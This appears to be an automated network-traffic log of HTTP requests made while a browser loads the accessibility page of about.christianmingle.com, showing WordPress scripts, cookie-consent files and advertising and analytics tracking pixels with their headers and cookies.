Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.easypiechart.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1
Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1728225781827&id=a2_fcfvqg5hztts&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=e049edff-96bd-4808-a785-abfedcfc59f6&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.5.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1; pll_language=en
Source: global trafficHTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /action/0?ti=27017382&Ver=2&mid=c6b1c4db-050a-4f0b-921b-3699b1914bc3&sid=4afa06a083f111efa110a14db6664e4b&vid=4afa3ca083f111efa0c83f7b509fe67f&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Our%20Commitment%20to%20Accessibility%20-%20About%20-%20Christian%20Mingle&p=https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F&r=&lt=8203&evt=pageLoad&sv=1&cdb=AQAQ&rn=574263 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v3/?event=pagevisit&ed=%7B%22np%22%3A%22gtm%22%2C%22event_id%22%3A%22e75628eb-50f0-4a64-a25f-6d81889a2f47%22%7D&tid=2612341756004&cb=1728225784006&dep=5%2CEVENT_TAGS_ABSENT&pd=%7B%22np%22%3A%22gtm%22%7D&ad=%7B%22loc%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22ref%22%3A%22%22%2C%22if%22%3Afalse%2C%22sh%22%3A1024%2C%22sw%22%3A1280%2C%22mh%22%3A%2297c41ef3%22%2C%22is_eu%22%3Atrue%2C%22architecture%22%3A%22x86%22%2C%22bitness%22%3A%2264%22%2C%22brands%22%3A%5B%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22117%22%7D%2C%7B%22brand%22%3A%22Not%3BA%3DBrand%22%2C%22version%22%3A%228%22%7D%2C%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22117%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0.0%22%2C%22uaFullVersion%22%3A%22117.0.5938.134%22%2C%22ecm_enabled%22%3Atrue%7D HTTP/1.1Host: ct.pinterest.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAttribution-Reporting-Eligible: trigger=navigation-source;event-sourceReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.fittext.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1; pll_language=en; _pin_unauth=dWlkPVpHWmlaVFJrTVdNdE1tVmhNUzAwT0dSaUxXRTNZbU10TjJGaFpUVTROamRoWXpZMg; _uetsid=4afa06a083f111efa110a14db6664e4b; _uetvid=4afa3ca083f111efa0c83f7b509fe67f
Source: global trafficHTTP traffic detected: GET /wp-includes/js/hoverIntent.min.js?ver=1.10.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1; pll_language=en; _pin_unauth=dWlkPVpHWmlaVFJrTVdNdE1tVmhNUzAwT0dSaUxXRTNZbU10TjJGaFpUVTROamRoWXpZMg; _uetsid=4afa06a083f111efa110a14db6664e4b; _uetvid=4afa3ca083f111efa0c83f7b509fe67f
Source: global trafficHTTP traffic detected: GET /p/action/27017382.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/scripts.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1; pll_language=en; _pin_unauth=dWlkPVpHWmlaVFJrTVdNdE1tVmhNUzAwT0dSaUxXRTNZbU10TjJGaFpUVTROamRoWXpZMg; _uetsid=4afa06a083f111efa110a14db6664e4b; _uetvid=4afa3ca083f111efa0c83f7b509fe67f
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/js/theme-script.js?ver=1.2.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1; pll_language=en; _pin_unauth=dWlkPVpHWmlaVFJrTVdNdE1tVmhNUzAwT0dSaUxXRTNZbU10TjJGaFpUVTROamRoWXpZMg; _uetsid=4afa06a083f111efa110a14db6664e4b; _uetvid=4afa3ca083f111efa0c83f7b509fe67f
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=adtheorent&google_hm=StZMkYPxEe-m6RLhNh7TWw&google_redir=https%3A%2F%2Frtb.adentifi.com%2FCookieSyncAdXCheck&google_ula=6802874232 HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1121901/trc/3/json?tim=1728225782020&data=%7B%22id%22%3A276%2C%22ii%22%3A%22%2Fen%2Flegal-en%2Four-commitment-to-accessibility%22%2C%22it%22%3A%22video%22%2C%22sd%22%3Anull%2C%22ui%22%3Anull%2C%22vi%22%3A1728225782001%2C%22cv%22%3A%2220241006-3-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22e%22%3Anull%2C%22cb%22%3A%22TFASC.trkCallback%22%2C%22qs%22%3A%22%22%2C%22r%22%3A%5B%7B%22li%22%3A%22rbox-tracking%22%2C%22s%22%3A0%2C%22uim%22%3A%22rbox-tracking%3Apub%3Dsparkscusen%3Aabp%3D0%22%2C%22uip%22%3A%22rbox-tracking%22%2C%22orig_uip%22%3A%22rbox-tracking%22%7D%5D%2C%22mpvd%22%3A%7B%22en%22%3A%22page_view%22%2C%22tim%22%3A1728225782019%2C%22ref%22%3Anull%2C%22item-url%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22tos%22%3A3%2C%22ssd%22%3A1%2C%22scd%22%3A0%2C%22it%22%3A%22JS_PIXEL%22%2C%22supv%22%3Atrue%7D%2C%22pa%22%3A%7B%22su%22%3Atrue%7D%2C%22psb%22%3Atrue%7D&pubit=i HTTP/1.1Host: trc.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_gid=b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779
Source: global trafficHTTP traffic detected: GET /consent/0232e281-a585-4e05-8d99-2fec39bf53fe/0232e281-a585-4e05-8d99-2fec39bf53fe.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.5.3 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781; _rdt_uuid=1728225781823.e049edff-96bd-4808-a785-abfedcfc59f6; _ga=GA1.2.1466259462.1728225782; _gid=GA1.2.1352145728.1728225782; _gat_GTM-W5JKC56=1; pll_language=en; _pin_unauth=dWlkPVpHWmlaVFJrTVdNdE1tVmhNUzAwT0dSaUxXRTNZbU10TjJGaFpUVTROamRoWXpZMg; _uetsid=4afa06a083f111efa110a14db6664e4b; _uetvid=4afa3ca083f111efa0c83f7b509fe67f; _tt_enable_cookie=1; _ttp=MPTyuoLXN8tuFkgr9Bxu_J-raUb
Source: global trafficHTTP traffic detected: GET /1121901/log/3/unip?en=pre_d_eng_tb&tos=2008&scd=0&ssd=1&est=1728225782012&ver=36&isls=true&src=i&invt=1500&msa=209&rv=1&tim=1728225783578&mrir=to&vi=1728225782001&ref=null&cv=20241006-3-RELEASE&item-url=https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F&it=JS_PIXEL HTTP/1.1Host: trc-events.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Attribution-Reporting-Eligible: triggersec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_gid=b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779; t_pt_gid=b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=adtheorent&google_hm=StZMkYPxEe-m6RLhNh7TWw&google_redir=https%3A%2F%2Frtb.adentifi.com%2FCookieSyncAdXCheck&google_ula=6802874232&google_tc= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /consent/0232e281-a585-4e05-8d99-2fec39bf53fe/0232e281-a585-4e05-8d99-2fec39bf53fe.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripttemplates/6.14.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /CookieSyncAdXCheck?google_ula=6802874232,0 HTTP/1.1Host: rtb.adentifi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: adtheorent[cuid]=cuid_4ad64c91-83f1-11ef-a6e9-12e1361ed35b
Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /consent/0232e281-a585-4e05-8d99-2fec39bf53fe/433e385e-3ee9-4687-8aec-4e957b0cb255/en.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripttemplates/6.14.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/ct/token_create.js HTTP/1.1Host: ct.pinterest.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; _pinterest_ct_ua="TWc9PSZpOFB6ZXQvWU8xSGNPMk4wRkszcGNaQm9oS25zdVQ4WitWQzlSaHMwVDdpZFN2ZkF2UzZqZWl4QUpsOFNpZ1QxelhqRWhPeHJlbWduVVlTWFBNMnpkMllET3pXVUg1Vmd1ZWhMa3VBZDlrUT0mckszNk5EeHdtSDdPRGVvTWNpMUZ2ajU3OERJPQ=="
Source: global trafficHTTP traffic detected: GET /ct.html HTTP/1.1Host: ct.pinterest.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; _pinterest_ct_ua="TWc9PSZpOFB6ZXQvWU8xSGNPMk4wRkszcGNaQm9oS25zdVQ4WitWQzlSaHMwVDdpZFN2ZkF2UzZqZWl4QUpsOFNpZ1QxelhqRWhPeHJlbWduVVlTWFBNMnpkMllET3pXVUg1Vmd1ZWhMa3VBZDlrUT0mckszNk5EeHdtSDdPRGVvTWNpMUZ2ajU3OERJPQ=="
Source: global trafficHTTP traffic detected: GET /1121901/log/3/unip?en=pre_d_eng_tb&tos=4582&scd=0&ssd=1&est=1728225782012&ver=36&isls=true&src=i&invt=3000&msa=209&rv=1&tim=1728225786598&mrir=tto&vi=1728225782001&ref=null&cv=20241006-3-RELEASE&item-url=https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F&it=JS_PIXEL HTTP/1.1Host: trc-events.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Attribution-Reporting-Eligible: triggersec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_gid=b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779; t_pt_gid=b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /consent/0232e281-a585-4e05-8d99-2fec39bf53fe/433e385e-3ee9-4687-8aec-4e957b0cb255/en.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripttemplates/6.14.0/assets/otFloatingRoundedCorner.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://about.christianmingle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
